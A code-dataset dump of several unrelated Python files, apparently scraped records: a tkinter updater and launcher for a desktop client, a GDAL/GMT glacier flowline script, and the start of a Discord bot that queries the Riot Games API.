pady=(self.outer_x_y, self.inner_x_y), sticky='nsew')\n # upper frame_\n self.upper_frame_2 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_2.grid(row=2, column=0, rowspan=4, padx=(self.outer_x_y, self.inner_x_y),\n pady=self.inner_x_y,\n sticky='nsew')\n # upper frame_\n self.upper_frame_3 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_3.grid(row=6, column=0, rowspan=2, columnspan=5, padx=(self.outer_x_y, self.inner_x_y),\n pady=(self.inner_x_y, self.outer_x_y), sticky='nsew')\n # upper frame_\n self.upper_frame_4 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_4.grid(row=0, column=1, rowspan=3, columnspan=5, padx=self.inner_x_y,\n pady=(self.outer_x_y, self.inner_x_y), sticky='nsew')\n # upper frame_\n self.upper_frame_5 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_5.grid(row=3, column=1, columnspan=3, padx=self.inner_x_y, pady=self.inner_x_y,\n sticky='nsew')\n # upper frame_\n self.upper_frame_6 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_6.grid(row=4, column=1, rowspan=2, padx=self.inner_x_y, pady=self.inner_x_y, sticky='nsew')\n # upper frame_\n self.upper_frame_7 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_7.grid(row=4, column=2, rowspan=2, columnspan=3, padx=self.inner_x_y, pady=self.inner_x_y,\n sticky='nsew')\n # upper frame_\n self.upper_frame_8 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_8.grid(row=0, column=6, columnspan=2, padx=self.inner_x_y,\n pady=(self.outer_x_y, self.inner_x_y), sticky='nsew')\n # upper frame_\n self.upper_frame_9 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_9.grid(row=1, column=6, columnspan=5, padx=self.inner_x_y, pady=self.inner_x_y,\n sticky='nsew')\n # upper frame_\n self.upper_frame_10 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_10.grid(row=2, column=6, padx=self.inner_x_y, pady=self.inner_x_y, sticky='nsew')\n # upper frame_\n self.upper_frame_11 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_11.grid(row=3, column=4, columnspan=3, padx=self.inner_x_y, pady=self.inner_x_y,\n sticky='nsew')\n # upper frame_\n self.upper_frame_12 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_12.grid(row=4, column=5, rowspan=4, columnspan=2, padx=self.inner_x_y,\n pady=(self.inner_x_y, self.outer_x_y), sticky='nsew')\n # upper frame_\n self.upper_frame_13 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_13.grid(row=2, column=7, rowspan=3, columnspan=3, padx=self.inner_x_y, pady=self.inner_x_y,\n sticky='nsew')\n\n # upper frame_\n self.upper_frame_14 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_14.grid(row=5, column=7, columnspan=3, padx=self.inner_x_y, pady=self.inner_x_y,\n sticky='nsew')\n # upper frame_\n self.upper_frame_15 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_15.grid(row=6, column=7, rowspan=2, columnspan=4, padx=self.inner_x_y,\n pady=(self.inner_x_y, self.outer_x_y), sticky='nsew')\n # upper frame_\n self.upper_frame_16 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_16.grid(row=0, column=8, columnspan=7, padx=(self.inner_x_y, self.outer_x_y),\n pady=(self.outer_x_y, self.inner_x_y), sticky='nsew')\n\n # upper frame_\n self.upper_frame_17 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_17.grid(row=1, column=11, rowspan=2, columnspan=4, padx=(self.inner_x_y, self.outer_x_y),\n pady=self.inner_x_y, sticky='nsew')\n # upper frame_\n self.upper_frame_18 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_18.grid(row=2, column=10, rowspan=4, padx=self.inner_x_y, pady=self.inner_x_y,\n sticky='nsew')\n # upper frame_\n self.upper_frame_19 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_19.grid(row=3, column=11, rowspan=4, columnspan=2, padx=self.inner_x_y,\n pady=self.inner_x_y,\n sticky='nsew')\n\n # upper frame\n self.upper_frame_20 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_20.grid(row=3, column=13, rowspan=2, columnspan=2, padx=(self.inner_x_y, self.outer_x_y),\n pady=self.inner_x_y, sticky='nsew')\n # upper frame\n self.upper_frame_21 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_21.grid(row=5, column=13, rowspan=2, columnspan=2, padx=(self.inner_x_y, self.outer_x_y),\n pady=self.inner_x_y, sticky='nsew')\n # upper frame\n self.upper_frame_22 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_22.grid(row=7, column=11, columnspan=4, padx=(self.inner_x_y, self.outer_x_y),\n pady=(self.inner_x_y, self.outer_x_y), sticky='nsew')\n\n # cneter frame 中間框框最外圍的顏色!!\n self.center_mom_frame = ttk.Frame(self.master, style='Center_outer.TFrame')\n self.center_mom_frame.place(anchor='c', relx=.5, rely=.5)\n\n # 中間區塊 (外圍) 可改變 login 框框 大小\n self.center_small_mom_frame = ttk.Frame(self.center_mom_frame, width=750, height=300,\n style='Center_bar.TFrame') # , style='Center_bar.TFrame'\n self.center_small_mom_frame.pack(fill=\"both\", expand=True, padx=5, pady=5)\n\n # 中間區塊 (內圍) 可改變 login 框框 大小\n self.center_son_frame = ttk.Frame(self.center_small_mom_frame, width=700, height=275,\n style='Center_content.TFrame') # , style='Center_content.TFrame'\n self.center_son_frame.pack(fill=\"both\", expand=True, padx=7, pady=7, ipady=30)\n # ensure a consistent GUI size\n self.center_son_frame.grid_propagate(False)\n\n self.center_son_frame.grid_rowconfigure(0, weight=0)\n self.center_son_frame.grid_rowconfigure(1, weight=1)\n self.center_son_frame.grid_rowconfigure(2, weight=1)\n self.center_son_frame.grid_rowconfigure(3, weight=1)\n\n self.center_son_frame.grid_columnconfigure(0, weight=1)\n self.center_son_frame.grid_columnconfigure(1, weight=1)\n self.center_son_frame.grid_columnconfigure(2, weight=1)\n self.center_son_frame.grid_columnconfigure(3, weight=0)\n self.center_son_frame.grid_columnconfigure(4, weight=1)\n\n # 顯示狀態\n self.detect_status = StringVar()\n self.detect_status.set(self.detect_global_info.detect_status)\n\n # infinity loop flag\n self.detect_status_flag = 'pc_open'\n self.pc_version_ = self.detect_global_info.pc_version\n # ============================================================================================\n\n self.upper_frame_4_label = ttk.Label(self.center_son_frame)\n self.upper_frame_4_label.grid(row=0, column=0, columnspan=5, padx=(5, 5), pady=(40, 0), sticky='ewsn')\n self.hyweb_logo_img_300 = PhotoImage(file='{}/src/spaceme_550_r.png'.format(self.direction_path))\n self.upper_frame_4_label.image = self.hyweb_logo_img_300\n self.upper_frame_4_label.config(image=self.upper_frame_4_label.image, anchor=CENTER, background=\"snow\")\n\n self.detect_status_label = ttk.Label(self.center_son_frame, textvariable=self.detect_status, font=(\"\", 25, \"\"))\n\n self.detect_status_loading_img = PhotoImage(file='{}/src/uctp_version.png'.format(self.direction_path))\n self.detect_status_label.img = self.detect_status_loading_img\n self.detect_status_label.grid(row=2, column=1, columnspan=3, sticky='wesn')\n self.detect_status_label.config(compound=LEFT, image=self.detect_status_label.img, background=\"snow\")\n\n # declare a index_number for iterating \"gif -index {}\"\n self.index_number = 0\n # ==============================================================================================\n\n # 判斷有無 ip 使用\n def sock_checker(self):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex(('localhost', 5000))\n # result == 0 代表 有使用\n if result == 0:\n return False\n else:\n return True\n\n # 呼叫 open_main_gui bat\n def open_main_gui(self):\n try:\n subprocess.call(\"C:/Program Files/Hyweb/hyweb_desktop.bat\")\n except:\n print(\"開啟檔案錯誤!\")\n logger.exception(\"Got exception on open main gui:\")\n pass\n\n def disable_event(self):\n pass\n\n # 偵測port 5000 有無被使用!\n def detecting_port(self):\n threading.Timer(5, self.detecting_port).start()\n # 加入另一層判斷 當 main gui 的\n if os.path.exists(\"C:\\Program Files\\Hyweb\\hyweb_desktop\\gui_open.ini\"):\n # self.sock_checker() ---> 回傳 True 代表 port 5000 沒有被使用! , 就會開啟 gui!\n # 表示 main_flask 被 close 了 ---> open again!\n if self.sock_checker():\n # 判斷有無 gui_open檔案 有的話先刪掉 因為會影響 port detector 的判斷\n if os.path.exists(\"C:\\Program Files\\Hyweb\\hyweb_desktop\\gui_open.ini\"):\n os.remove(\"C:\\Program Files\\Hyweb\\hyweb_desktop\\gui_open.ini\")\n self.open_main_gui()\n else:\n pass\n print(\"opened already\")\n\n # 開啟偵偵測程式 有open.ini 才縮小\n def detecting_port_opener(self):\n\n for i in range(100):\n time.sleep(1)\n # self.master.withdraw()\n if os.path.exists(\"C:\\Program Files\\Hyweb\\hyweb_desktop\\open.ini\"):\n # 一偵測到 open.ini 代表 GUI 開啟 將 detect 縮小\n self.master.withdraw()\n logger.info(\"turn on detecting_port !\")\n self.detecting_port()\n break\n else:\n logger.info(\"gui hasn't opened!!\")\n print(\"沒測到 open.ini 還沒開啟GUI \")\n continue\n\n self.master.withdraw()\n\n def create_run_run_gif_thread(self):\n run_gif_thread = threading.Thread(target=self._run_run_gif)\n run_gif_thread.start()\n\n # the coolest running gif function\n # using tkinter after function to run a infinite loop showing cool gif animation\n def _run_run_gif(self):\n while True:\n time.sleep(0.05)\n if self.index_number >= 24:\n self.index_number = 0\n else:\n self.detect_status_label.img = PhotoImage(file='{}/src/loading_3.gif'.format(self.direction_path),\n format=\"gif -index {}\".format(self.index_number))\n self.detect_status_label.config(image=self.detect_status_label.img,\n anchor=CENTER,\n background=\"snow\")\n # add one to index_number\n self.index_number += 1\n\n # run 主要 detecting 的功能\n def _run_detect_function(self):\n # 每三秒 這個funciton 自己跑一次\n self._identifier_after = self.master.after(3000, self._run_detect_function)\n print(\"self._identifier_after: \" + self._identifier_after)\n # pc open\n # (pc_open) get version from hyweb_desktop: ok ---> continue , not ok ---> open old gui\n if self.detect_status_flag == 'pc_open':\n try:\n # open PC端 hyweb_desktop 內部的 version.txt\n file = open('{}/hyweb_desktop/hyweb_version.txt'.format(self.file_path), 'r')\n # load 成 json 格式\n json_file = json.load(file)\n print(\"開檔案\")\n except:\n # open\n print(\"file open exception:\")\n logger.exception(\"Got exception on PC version_file open:\")\n # 例外處裡的化 還是要關掉\n self.detect_status_flag = \"open_gui\"\n # 抓到例外 跳出這次loop\n return\n # 顯示在gui上的字\n self.detect_status.set(\"連線中...\") # 初始化...\n\n # parsing json file\n try:\n for key, value in json_file.items():\n if key == 'version':\n self.pc_version_ = value\n print(\"pc_version: {}\".format(self.pc_version_))\n logger.info(\"pc_version: {}\".format(self.pc_version_))\n file.close()\n except:\n # open\n print(\"file open exception:\")\n logger.exception(\"Got exception on PC file parsing json:\")\n # 例外處裡的化 還是要關掉\n self.detect_status_flag = \"open_gui\"\n # 抓到例外 跳出這次loop\n return\n\n self.detect_status_flag = \"version_compare\"\n self.detect_status.set(\"連線中...\") # 版本比對中\n print(\"比對版本中!\")\n\n # [version_compare] 版本比對 塞入文字 和 flag: same_version or different_version\n elif self.detect_status_flag == \"version_compare\":\n # 看網路有無問題\n try:\n # Hyweb: https://mighty-harbor-53134.herokuapp.com/detect,\n # Chihlee: 172.16.89.1, uctp: 203.68.9.151\n # 呼叫API拿最新版本資訊 這裡會是 agent 的 url API: /sb-ac-agent/rest/ac/client/pcTerminals/clientVersion\n req = urllib.request.urlopen(\"http://{}:{}/sb-ac-agent/rest/ac/client/pcTerminals/clientVersion\".format(self.detect_global_info.default_ip, self.detect_global_info.default_port), timeout=5)\n # 用 byte 讀取檔案\n online_byte_req = req.read()\n # 轉檔成 utf-8\n online_json_file = online_byte_req.decode('utf-8')\n # loads 成 json 檔案\n online_json_data = json.loads(online_json_file)\n # API json: value ---> version number\n for key, value in online_json_data.items():\n # self-customized heroku: urllink\n if key == \"urllink\":\n self.detect_global_info.url_download_link = value\n print(\"url_download_link: {}\".format(self.detect_global_info.url_download_link))\n logger.info(\"url_download_link is available\")\n # API json: value ---> version number\n # self-customized heroku: version\n elif key == \"value\":\n self.detect_global_info.online_version = value\n print(\"online_version: {}\".format(self.detect_global_info.online_version))\n logger.info(\"online_version: {}\".format(self.detect_global_info.online_version))\n except TimeoutError:\n # got exception so just run the old file 還是說最新版\n print(\"[TimeoutError] got exception version_compare urlopen:\")\n logger.exception(\"Got exception on version_compare urlopen[TimeoutError]:\")\n self.detect_status_flag = \"same_version\"\n return\n except urllib.error.URLError:\n # got exception so just run the old file 還是說最新版\n print(\"[urllib.error.URLError] got exception urlopen:\")\n logger.exception(\"Got exception on urlopen[urllib.error.URLError]:\")\n self.detect_status_flag = \"same_version\"\n return\n except:\n # got exception so just run the old file 還是說最新版\n print(\"[Exception in general] got exception urlopen:\")\n logger.exception(\"Got exception on urlopen[Exception in general]:\")\n self.detect_status_flag = \"same_version\"\n return\n\n if self.detect_global_info.online_version == self.pc_version_:\n self.detect_status_flag = \"same_version\"\n else:\n self.detect_status_flag = \"different_version\"\n self.detect_status.set(\"偵測到新版本!\")\n\n # [same_version]相同版本 塞入文字 和 flag: open_gui\n elif self.detect_status_flag == \"same_version\":\n self.detect_status.set(\"連線中...\") # 比對完成!\n self.detect_status_flag = \"open_gui\"\n\n # [different_version]版本不同 塞入文字 和 flag: \"download_new_version\"\n elif self.detect_status_flag == \"different_version\":\n self.detect_status_flag = \"download_new_version\"\n self.detect_status.set(\"更新中...\")\n\n # 下載新版本 塞入文字 和 flag: \"open_gui\"\n elif self.detect_status_flag == \"download_new_version\":\n\n # 判斷有無此檔案 有的話先改名字\n if os.path.isdir(\"{}/hyweb_desktop\".format(self.file_path)):\n logger.warning(\"Change folder name before download new version zip:\")\n print(\"Change folder name before download new version zip:\")\n os.rename(\"{}/hyweb_desktop\".format(self.file_path), \"{}/hyweb_desktop_old\".format(self.file_path))\n\n try:\n # 下載檔案x url: /sb-ac-agent/rest/ac/client/pcTerminals/clientFile\n # \"http://203.68.9.151:8080/sb-ac-agent/rest/ac/client/pcTerminals/clientFile\"\n # self.detect_global_info.url_download_link\n r = requests.get(\"http://{}:{}/sb-ac-agent/rest/ac/client/pcTerminals/clientFile\".format(self.detect_global_info.default_ip, self.detect_global_info.default_port))\n z = zipfile.ZipFile(io.BytesIO(r.content))\n a = z.extractall(\"{}/\".format(self.file_path))\n z.close()\n except:\n # 下載檔案失敗\n logger.error(\"Got exception on downloading new_version zip file :\")\n print(\"Got exception on downloading new_version zip file :\")\n # 下載檔案失敗 看有無新建的資料夾 有的話清理乾淨\n if os.path.isdir(\"{}/hyweb_desktop\".format(self.file_path)):\n shutil.rmtree(\"{}/hyweb_desktop\".format(self.file_path))\n logger.warning(\"Deleting folder from downloading_new_version_zip file exception\")\n print(\"Deleting folder from downloading_new_version_zip file exception\")\n # 再把改的名字_old 改回來 然後 flag= \"open_gui\"\n if os.path.isdir(\"{}/hyweb_desktop_old\".format(self.file_path)):\n os.rename(\"{}/hyweb_desktop_old\".format(self.file_path), \"{}/hyweb_desktop\".format(self.file_path))\n logger.warning(\"Change folder name back, from downloading_new_version_zip file exception\")\n print(\"Change folder name back, from downloading_new_version_zip file exception\")\n self.detect_status_flag = \"open_gui\"\n return\n # 解壓縮當案成功\n logger.info(\"extract zip success! YA!\")\n print(\"extract zip success! YA!\")\n # 都成功後 把舊的殺掉 ~\n if os.path.isdir(\"{}/hyweb_desktop_old\".format(self.file_path)):\n shutil.rmtree(\"{}/hyweb_desktop_old\".format(self.file_path))\n print(\"Deleting old folder after downloading successful!\")\n logger.info(\"Deleting old folder after downloading successful!\")\n\n self.detect_status_flag = \"open_gui\"\n\n # (open_gui) open old gui\n elif self.detect_status_flag == \"open_gui\":\n self.detect_status.set(\"連線完成!\") # 連線完成\n self.detect_status_flag = \"detecting_port\"\n # 開啟main_gui()\n self.open_main_gui()\n print(\"open gui\")\n logger.info(\"open gui\")\n\n elif self.detect_status_flag == \"detecting_port\":\n # self.master.withdraw()\n # detecting port~~~~~~~~~~\n\n # 到這步的時候就關掉 timer\n # self.create_run_detect_thread.cancel()\n self.master.after_cancel(self._identifier_after)\n logger.info(\"cancel version detect timer\")\n\n # calling detecting_port function cancel the Timer run_detect_thread\n self.detecting_port_opener()\n logger.info(\"create detecting_port_opener~ \")\n\n print(\"watching_port\")\n\n\nclass DetectGlobalInfo:\n def __init__(self):\n self._detect_status = 'Connecting....'\n self._pc_version = ''\n self._online_version = ''\n self._url_download_link = ''\n\n # UCTP ---> ip: 120.102.68.51, port: 8080\n self._default_ip = '120.102.68.51'\n self._default_port = '8080'\n\n # default_ip getter\n @property\n def default_ip(self):\n return self._default_ip\n\n # default_ip setter\n @default_ip.setter\n def default_ip(self, value):\n self._default_ip = value\n\n # default_port getter\n @property\n def default_port(self):\n return self._default_port\n\n # default_port setter\n @default_port.setter\n def default_port(self, value):\n self._default_port = value\n\n # detect_status getter\n @property\n def detect_status(self):\n return self._detect_status\n\n # detect_status setter\n @detect_status.setter\n def detect_status(self, value):\n self._detect_status = value\n\n # version getter\n @property\n def pc_version(self):\n return self._pc_version\n\n # version setter\n @pc_version.setter\n def pc_version(self, value):\n self._pc_version = value\n\n # url_download_link getter\n @property\n def url_download_link(self):\n return self._url_download_link\n\n # version setter\n @url_download_link.setter\n def url_download_link(self, value):\n self._url_download_link = value\n\n # online_version getter\n @property\n def online_version(self):\n return self._online_version\n\n # online_version setter\n @online_version.setter\n def online_version(self, value):\n self._online_version = value\n\n\ndef main():\n # 判斷有無 open檔案 有的話先刪掉 因為會影響等等 port detector 的判斷\n if os.path.exists(\"C:\\Program Files\\Hyweb\\hyweb_desktop\\open.ini\"):\n os.remove(\"C:\\Program Files\\Hyweb\\hyweb_desktop\\open.ini\")\n # 判斷有無 gui_open檔案 有的話先刪掉 因為會影響等等 port detector 的判斷\n if os.path.exists(\"C:\\Program Files\\Hyweb\\hyweb_desktop\\gui_open.ini\"):\n os.remove(\"C:\\Program Files\\Hyweb\\hyweb_desktop\\gui_open.ini\")\n\n root = Tk()\n global global_info\n global_info = DetectGlobalInfo()\n\n # 讀取config file\n try:\n config = configparser.ConfigParser()\n config.read(\"C:\\Program Files\\Hyweb\\config.ini\")\n global_info.default_ip = config.get('UCTP', 'ip').strip('\"')\n global_info.default_port = config.get('UCTP', 'port').strip('\"')\n except:\n pass\n app_gui = DetectGui(root, global_info)\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"detect/detect_gui.py","file_name":"detect_gui.py","file_ext":"py","file_size_in_byte":32856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"64579886","text":"# #!/usr/bin/env python2.7\n\nimport numpy as np\nimport os\nfrom osgeo import ogr,osr\nfrom shapely.wkt import loads\nimport sys\n\nimport faulthandler\nfaulthandler.enable()\n\n\ndef FindStringBetweenSign(file,sign):\n\tvalue = file.split(sign)\n\treturn value\n\nif (len(sys.argv) > 1):\n\tseed_file = sys.argv[1]\n\tvx = sys.argv[2]\n\tvy = sys.argv[3]\n\toutshape = sys.argv[4]\n\n\tseedname = FindStringBetweenSign(seed_file,\"/\")[-1][:-4]\n\tvxname = FindStringBetweenSign(vx,\"/\")[-1][:-4]\n\tvyname = FindStringBetweenSign(vy,\"/\")[-1][:-4]\n\n\tds=ogr.Open(seed_file)\n\tlyr=ds.GetLayer()\n\tproj=lyr.GetSpatialRef()\n\tcoord_list = []\n\tfor feat in lyr:\n\t\tgeom = feat.GetGeometryRef()\n\t\tx,y=geom.GetX(), geom.GetY() #coord in map units\n\t\tcoord_list = np.append(coord_list,x)\n\t\tcoord_list = np.append(coord_list,y)\n\t#coord_list = coord_list.reshape(len(coord_list)/2,2)\n\tcoord_list = coord_list.reshape(-1, 2)\n\tseeds = np.sort(coord_list.view('float,float'), order=['f0'], axis=0).view(np.float)\n\tnp.savetxt(seedname+\".txt\",seeds,fmt='%s')\n\n\t#######generate flowlines\n\tif not os.path.exists(vxname+\".grd\"):\n\t\tos.system(\"gdalwarp \"+vx+\" -of netCDF \"+vxname+\".nc -tr 250 250 -r bilinear -overwrite\")\n\t\tos.system(\"gdalwarp \"+vy+\" -of netCDF \"+vyname+\".nc -tr 250 250 -r bilinear -overwrite\")\n\t\tos.system(\"gmt grdconvert \"+vxname+\".nc \"+vxname+\".grd\")\n\t\tos.system(\"gmt grdconvert \"+vyname+\".nc \"+vyname+\".grd\")\n\tos.system(\"./grd2stream \"+vxname+\".grd \"+vyname+\".grd -f \"+seedname+\".txt > grd2stream_out\")\n\t\n\tflowlines = np.genfromtxt(\"grd2stream_out\")\n\tbreak_list = np.where(np.isnan(flowlines[:,0]))[0]\n\tflowlines = np.delete(flowlines,break_list, axis=0)\n\tbreak_list_new = break_list-(np.arange(len(break_list)))\n\tbreak_list_new = np.delete(break_list_new, 0)\n\tflowlines_split = np.split(flowlines,break_list_new)\n\tprofile_list = []\n\tnew_i = 0\n\tfor i in np.arange(len(flowlines_split)):\n\t\tif len(flowlines_split[i])>1:\n\t\t\tnew_i = new_i+1\n\t\t\tline = ogr.Geometry(ogr.wkbLineString)\n\t\t\ttmplist = []\n\t\t\tfor j in np.arange(len(flowlines_split[i][:,0])):\n\t\t\t\tlx = flowlines_split[i][j][0]\n\t\t\t\tly = flowlines_split[i][j][1]\n\t\t\t\ttmplist.append(lx)\n\t\t\t\tline.AddPoint(lx,ly)\n\t\t\tif len(tmplist)>1:\n\t\t\t\tlineGeometry = ogr.CreateGeometryFromWkt(line.ExportToWkt())\n\t\t\t\tlineShapely = loads(line.ExportToWkt())\n\t\t\t\tprofile_list.append(lineShapely)\n\n\t####create output shapefile\n\tdest_srs = proj\n\toutShapefile = outshape\n\toutDriver = ogr.GetDriverByName('Esri Shapefile')\n\tif os.path.exists(outShapefile):\n\t\toutDriver.DeleteDataSource(outShapefile)\n\toutDataSource = outDriver.CreateDataSource(outShapefile)\n\tlayer = outDataSource.CreateLayer('', dest_srs, ogr.wkbLineString)\n\tlayer.CreateField(ogr.FieldDefn('id', ogr.OFTInteger))\n\tdefn = layer.GetLayerDefn()\n\tfor i in np.arange(len(profile_list)):\n\t\tfeat = ogr.Feature(defn)\n\t\tfeat.SetField('id', str(i+1))\n\t\tgeom = ogr.CreateGeometryFromWkb(profile_list[i].wkb)\n\t\tfeat.SetGeometry(geom)\n\t\tlayer.CreateFeature(feat)\n\t\tfeat = geom = None\n\toutDataSource = layer = feat = geom = None\nelse:\n\tprint('ok')\n\t#print(\"*** N.Neckel 2018 ***\")\n\t#print(\"*** Generate flowlines via grd2stream from point shapefile and output line shapefile ***\\n\")\n\t#print(\"usage: generate_flowlines.py \")\n #print(\" input.shp (input) point shape file with seed points\")\n #print(\" vx.tif (input) vx GeoTIFF file\")\n\t#print(\" vy.tif (input) vy GeoTIFF file\")\n\t#print(\" output.shp (output) line shape file\")\n","sub_path":"flowlines/py_gmt_script/generate_flowlines.py","file_name":"generate_flowlines.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"154958135","text":"from discord.ext import commands\nfrom cassiopeia import baseriotapi\nfrom cassiopeia.type.api.exception import APIError\nimport os\nimport sys\nimport re\nfrom urllib.error import HTTPError\nfrom basecommand import BaseCommand\nimport json\n\nif \"RIOT_API_KEY\" not in os.environ:\n print(\"\"\"Set your RIOT_API Key as an environment variable\n with the name API_KEY\"\"\")\n sys.exit(1)\n\nbaseriotapi.set_region(\"na\")\nbaseriotapi.set_api_key(os.environ[\"RIOT_API_KEY\"])\n\nclass DefaultIds:\n SUMMONER = 62489081 #Tux\n CHAMPION = 1 # Annie\n ITEM = 3089 # Raba\n MASTERY = 6121\n RUNE = 5235\n SUMMONER_SPELL = 4 # Flash\n SHARD = \"na\"\n QUEUE_TYPE = \"RANKED_SOLO_5x5\"\n MATCH = 2215927421\n SUMMONER_NAME = \"Riot Tuxedo\"\n\nclass CmdAPIRequest(BaseCommand):\n\n def __init__(self, bot):\n super().__init__(bot);\n self.server = SimpleHTTPServer(\"127.0.0.1\", 9600)\n self.server.start()\n\n\n @commands.command(pass_context=True, help=\"Returns the default values\")\n async def defaultParams(self, ctx):\n message = \"Summoner-Id: \" + str(DefaultIds.SUMMONER) + \"\\n\"\n message += \"Champion-Id: \" + str(DefaultIds.CHAMPION) + \"\\n\"\n message += \"Item-Id: \" + str(DefaultIds.ITEM) + \"\\n\"\n message += \"Mastery-Id: \" + str(DefaultIds.MASTERY) + \"\\n\"\n message += \"Rune-Id: \" + str(DefaultIds.RUNE) + \"\\n\"\n message += \"Summoner-Spell: \" + str(DefaultIds.SUMMONER_SPELL) + \"\\n\"\n message += \"Shard: \" + str(DefaultIds.SHARD) + \"\\n\"\n message += \"Queue-Type: \" + str(DefaultIds.QUEUE_TYPE) + \"\\n\"\n message += \"Match-Id: \" + str(DefaultIds.MATCH) + \"\\n\"\n message += \"Summoner-Name: \" + str(DefaultIds.SUMMONER_NAME) + \"\\n\"\n await self.sendMessage(ctx, message, False)\n \"\"\"\n Command to request static data from the api.\n Valid apis are listed in https://developer.riotgames.com/api/methods#!/1055/3629\n E. g. champion or languages\n This will send a message with a key to the data received and if an id\n was given add the id & name of the object to the send message.\n\n @param api valid api as listed under lol-static-data\n @param id optional id of an element. ignored if\n not required for the given api\n \"\"\"\n @commands.command(pass_context=True, pattern=re.compile(r'(?P...) (?P[0-9]+)'), help=\"This command sends a request to lol-static-data-v1.2. Valid names are: champion, item, language-strings, languages, map, mastery, realm, rune, summoner-spell and versions. If the second parameter is true default parameters will submitted to the api for the {id} parameter (e. g. for name = champion the default {id} is 1. Therefore Annie's static data is returned.)\")\n async def staticdata(self, ctx, api: str, withId: bool=False):\n result = None\n try:\n result = self._callStaticData(api, withId)\n message = self.server.addRecord(result)\n except APIError as err: # in case of 404/429 etc.\n message = \"HTTP Error %s\" % err.error_code\n except NoSuchMethodException:\n message = \"Method not found!\"\n isResultNone = result is None\n await self.sendMessage(ctx, message, isResultNone)\n\n def _callStaticData(self, api: str, withId: bool=False ):\n apiMethodName = \"get_\" + api.replace(\"-\", \"_\");\n isApiWithId = api in [\"champion\", \"item\", \"mastery\", \"rune\", \"summoner-spell\"]\n idMap = {\"champion\": DefaultIds.CHAMPION, \"item\": DefaultIds.ITEM, \"mastery\": DefaultIds.MASTERY, \"rune\": DefaultIds.RUNE, \"summoner-spell\": DefaultIds.SUMMONER_SPELL}\n if isApiWithId and withId:\n id = idMap[api]\n isListApi = api in [\"languages\", \"versions\"]\n # inconsistent in cassiopeia (map case)\n if (isApiWithId and not withId) or api == \"map\":\n apiMethodName = apiMethodName + \"s\"\n if api == \"mastery\" and not withId:\n apiMethodName = \"get_masteries\"\n\n methodToCall = self._checkForMethod(apiMethodName)\n if isApiWithId and withId:\n result = methodToCall(id)\n else:\n result = methodToCall()\n if isListApi:\n result = json.dumps(result, ensure_ascii=False, indent=4)\n else:\n result = result.to_json()\n return result;\n\n def _checkForMethod(self, apiMethodName):\n if hasattr(baseriotapi, apiMethodName):\n return getattr(baseriotapi, apiMethodName)\n else:\n raise NoSuchMethodException();\n\n @commands.command(pass_context=True, pattern=re.compile(r'(?Pchampion|score|topchampions) (?PTrue|False)'), help=\"Sends a request to the championmastery api. Valid values for api are champion, score and topchampions. If withChampionId == True and the champion api is specified the championmastery data for Annie is returned. The default player is Riot Tuxedo.\")\n async def championmastery(self, ctx, api: str, withChampionId: bool=False):\n result = None\n try:\n if api == \"champion\" or api == \"topchampions\":\n result = self._callChampionMastery(withChampionId)\n message = self.server.addRecord(result)\n elif api == \"score\":\n result = self._championmasteryscore()\n message = result;\n except APIError as err: # in case of 404/429 etc.\n message = \"HTTP Error %s\" % err.error_code\n except NoSuchMethodException:\n message = \"Method not found!\"\n isResultNone = result is None\n await self.sendMessage(ctx, message, isResultNone)\n\n def _callChampionMastery(self, withChampionId: bool=False):\n summonerId = DefaultIds.SUMMONER\n if withChampionId:\n championId = DefaultIds.CHAMPION\n if not withChampionId:\n api = \"get_champion_masteries\"\n else:\n api = \"get_champion_mastery\"\n method = self._checkForMethod(api)\n if not withChampionId:\n result = method(summonerId)\n # x.to_json() returns a string - thus the next json dump is not formatted properly\n # => use internal __dict__ because there is no method to retrieve it otherwise\n result = list(map(lambda x: x.__dict__, result))\n result = json.dumps(result, ensure_ascii=False, indent=4)\n else:\n result = method(summonerId, championId)\n result = result.to_json()\n return result;\n\n def _championmasteryscore(self):\n summonerId = DefaultIds.SUMMONER\n result = baseriotapi.get_champion_mastery_score(summonerId)\n #result = \"Mastery Score: %d\" % result\n return result\n\n @commands.command(pass_context=True, help=\"Requests the current-game-v1.0 data for Riot Tuxedo.\")\n async def currentgame(self, ctx):\n try:\n result = baseriotapi.get_current_game(DefaultIds.SUMMONER);\n if result is not None:\n result = result.to_json()\n message = self.server.addRecord(result)\n else:\n message = \"%s is currently not in a game.\" % DefaultIds.SUMMONER\n except APIError as err:\n message = \"HTTP Error: %s\" % err.error_code\n isResultNone = result is None\n await self.sendMessage(ctx, message, isResultNone)\n\n @commands.command(pass_context=True, help=\"Returns data from the featured-games-v1.0 endpoint\")\n async def featuredgames(self, ctx):\n try:\n result = baseriotapi.get_featured_games();\n result = result.to_json()\n message = self.server.addRecord(result)\n except APIError as err:\n message = \"HTTP Error: %s\" % err.error_code\n isResultNone = result is None\n await self.sendMessage(ctx, message, isResultNone)\n\n @commands.command(pass_context=True, help=\"Returns recent games from the game-v1.3 endpoint for the default summoner.\")\n async def game(self, ctx):\n summonerId = DefaultIds.SUMMONER\n 